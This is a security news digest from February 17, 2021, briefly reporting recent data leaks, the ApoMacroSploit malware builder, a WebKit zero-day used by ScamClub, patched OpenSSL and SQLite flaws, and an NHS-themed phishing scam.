Cyware Daily Threat Intelligence, February 17, 2021

Share Blog Post

The hide-and-seek game between security experts and threat actors is becoming complicated as the latter continue to refine their evasion techniques. A new toolkit dubbed APOMacroSploit has been disclosed that targeted more than 80 customers worldwide in an attempt to control victim machines and steal information remotely.

A threat actor group that goes by the name of ScamClub also emerged from the shadow after researchers released details about a massive malvertising campaign. The attackers leveraged a zero-day vulnerability in WebKit to launch their fraudulent gift card scams. Meanwhile, data leaks on the dark web drew major flak from security experts after Jones Day, Amazon, and eBay failed to protect their customer data.

Top Breaches Reported in the Last 24 Hours

Jones Day’s data leak
The gang behind the Clop ransomware has started leaking files allegedly stolen from the law firm Jones Day. The group has a website on the Tor network where it leaks files from organizations that refuse to pay up.

Customers’ account on sale
Data of 14 million Amazon and eBay customer accounts were put on sale on a popular hacking forum. The data dates back to 2014 and belongs to users from 18 different countries. The database was being sold for $800 and included details such as customers’ full names, postal codes, delivery addresses, and shop names.

One more victim on the dark web
Data stolen from a North Carolina county’s computer has also made it to the dark web, as per a new investigation. The county was hit by ransomware on October 28.

Top Malware Reported in the Last 24 Hours

ApoMacroSploit malware builder
Security researchers have detected a new Office malware builder, called ApoMacroSploit, that is capable of evading detection by Windows Defender. The malware infection begins when the dynamic content of the attached XLS document is enabled and an XLM macro automatically starts downloading a Windows system command script.

Phishing attacks
Threat actors have been found abusing the Ngrok platform in a new wave of phishing attacks. Some of the malware samples used in the campaign are Njrat, DarkComet, Quasar, Asynrat, and Nanocore.

Top Vulnerabilities Reported in the Last 24 Hours

Critical SDK flaw
A flaw discovered in SDK provided by Agora could have allowed attackers to snoop into users’ audio and video calls. The bug, tracked as CVE-2020-25605, affected the likes of MeetMe, Skout, Nimo TV, temi, Dr. First Backline, Hike, Bunch, and Talkspace.

WebKit zero-day exploited
A malvertising group named ScamClub exploited a zero-day vulnerability in the WebKit web browser engine to push payloads that redirected to gift card scams. The group covertly carried out the scam for three months using a mechanism that helped them bypass the iframe sandboxing policy.

OpenSSL patches three flaws
OpenSSL has announced the availability of patches for three vulnerabilities that can be exploited for DDoS attacks. The flaws are CVE-2021-23841, CVE-2021-23839, and CVE-2021-23840.

SQLite issues a patch
SQLite has issued a security patch for a vulnerability that could have triggered arbitrary code execution or denial of service. The flaw is related to a use-after-free bug and is marked as medium severity.

Top Scams Reported in the Last 24 Hours

NHS phishing scam
Security experts are warning of a new COVID-19 vaccine phishing scam that tricks users into handing over their personal and financial information. The recipients are informed that they have been selected for a job based on their family and medical history. The messages pretend to be from the trusted brand of the Health Service and promise of protection from the deadly virus.

 Tags

webkit
clop ransomware
sqlite
apomacrosploit malware
sdk flaw
openssl

Posted on: February 17, 2021


More from Cyware

Stay updated on the security threat landscape and technology innovations at Cyware with our threat intelligence briefings and blogs.


Join Thousands of Other Cyware Followers!